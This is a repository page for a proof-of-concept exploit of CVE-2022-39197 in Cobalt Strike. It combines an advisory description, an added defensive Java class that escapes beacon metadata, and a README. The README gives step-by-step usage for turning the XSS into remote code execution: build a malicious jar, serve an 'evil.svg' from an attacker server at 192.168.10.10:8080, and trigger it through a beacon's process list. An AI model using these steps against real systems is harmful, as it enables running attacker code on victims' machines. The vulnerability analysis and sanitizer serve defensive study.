
CVE-2022-39197 PoC — HelpSystems Cobalt Strike Cross-Site Scripting Vulnerability

Source
Associated Vulnerability
Title: HelpSystems Cobalt Strike Cross-Site Scripting Vulnerability (CVE-2022-39197)
Description: An XSS (Cross Site Scripting) vulnerability was found in HelpSystems Cobalt Strike through 4.7 that allowed a remote attacker to execute HTML on the Cobalt Strike teamserver. To exploit the vulnerability, one must first inspect a Cobalt Strike payload, and then modify the username field in the payload (or create a new payload with the extracted information and then modify that username field to be malformed).
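The description above attributes the bug to a malformed username field that ends up being rendered as HTML. As an added illustration, not code from Cobalt Strike or from this repository, the Java class below shows the defensive treatment a vendor or operator would apply to any attacker-controlled beacon metadata before it reaches a UI component that can interpret markup: a strict allow-list check, an HTML-escaping fallback, and a log line when a value is rejected. The class name, the allow-list policy and the sample values are assumptions made for this example.

```java
import java.util.regex.Pattern;

/**
 * Defensive handling of attacker-controlled beacon metadata (username,
 * process name, and similar fields) before it is displayed in a UI
 * component that can interpret HTML.
 * Illustration added for this page; not Cobalt Strike or repository code.
 */
public final class MetadataSanitizer {

    // Hypothetical policy: printable ASCII only, no markup characters, max 64 chars.
    private static final Pattern ALLOWED =
            Pattern.compile("[\\x20-\\x7E&&[^<>\"'&]]{1,64}");

    private MetadataSanitizer() {}

    /** Strict check: reject any value that could be interpreted as markup. */
    public static boolean isWellFormed(String value) {
        return value != null && ALLOWED.matcher(value).matches();
    }

    /** Lenient path: HTML-escape a value so a renderer shows it literally. */
    public static String escapeHtml(String value) {
        StringBuilder out = new StringBuilder(value.length());
        for (char c : value.toCharArray()) {
            switch (c) {
                case '<':  out.append("&lt;");   break;
                case '>':  out.append("&gt;");   break;
                case '&':  out.append("&amp;");  break;
                case '"':  out.append("&quot;"); break;
                case '\'': out.append("&#39;");  break;
                default:
                    // Drop control characters; keep everything else unchanged.
                    if (c >= 0x20 && c != 0x7F) {
                        out.append(c);
                    }
            }
        }
        return out.toString();
    }

    /**
     * Accept clean values as-is; otherwise escape them and emit an alert so
     * the operator can see that a beacon sent markup in a metadata field.
     */
    public static String displayValue(String value) {
        if (isWellFormed(value)) {
            return value;
        }
        String escaped = escapeHtml(value == null ? "" : value);
        System.err.println("[alert] beacon metadata contained markup or control "
                + "characters; displaying escaped form: " + escaped);
        return escaped;
    }

    public static void main(String[] args) {
        // Constructed sample values; not captured from any real beacon.
        String normal = "CORP\\jdoe";
        String suspicious = "<html><b>jdoe</b>";
        System.out.println(displayValue(normal));
        System.out.println(displayValue(suspicious));
    }
}
```

The strict check is the right default for a field that should only ever hold an account or process name; the escaping path exists so that a value which fails the check is still shown (as literal text) rather than silently dropped, and the alert line gives the teamserver operator a detection signal for beacons that carry unexpected markup.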
Description
CVE-2022-39197 RCE POC
Readme
# CVE-2022-39197-RCE

## First
  This project is a modified version of [@its-arun](https://github.com/its-arun)'s project https://github.com/its-arun/CVE-2022-39197

  When I tested the script, I found that the frida script could not query the data in the normal order. The fix was to modify the frida script so that it changes the process name.


Thanks to Master [@Kai5174](https://github.com/Kai5174) for his contribution to the exploitation technique.


### Usage

- **Prepare Payload**

1. Edit the command executed by the payload in `EvilJar/src/main/java/Exploit.java`; currently it only launches the calculator.

2. Build the jar with `mvn clean compile assembly:single`

3. Move `EvilJar-1.0-jar-with-dependencies.jar` from `EvilJar/target/` to the `serve/` folder

4. Edit `serve\evil.svg` and replace the `[attacker]` placeholder

5. Serve it with `python3 -m http.server 8080`

6. Generate beacon.exe with a C2 version less than or equal to 4.7

7. Run the Python script on a Windows host so that the beacon checks in; the counterattack is triggered when the client views the process list and sees the beacon.exe process.


- **Execute Exploit**

```bash
python3 -m pip install -r requirements.txt
python3 cve-2022-39197_Yyy.py beacon.exe http://192.168.10.10:8080/evil.svg
```

The payload is triggered as soon as the user scrolls through the Process List.

### POC

**Windows**
![1.png](./images/1.png)


**Mac**
![2.jpg](./images/2.jpg)


### Reference

[https://mp.weixin.qq.com/s/Eb0pQ-1ebLSKPUFC7zS6dg](https://mp.weixin.qq.com/s/Eb0pQ-1ebLSKPUFC7zS6dg) — a thorough in-depth analysis of this vulnerability
[https://www.agarri.fr/blog/archives/2012/05/11/svg_files_and_java_code_execution/index.html](https://www.agarri.fr/blog/archives/2012/05/11/svg_files_and_java_code_execution/index.html)

Modified from https://github.com/its-arun/CVE-2022-39197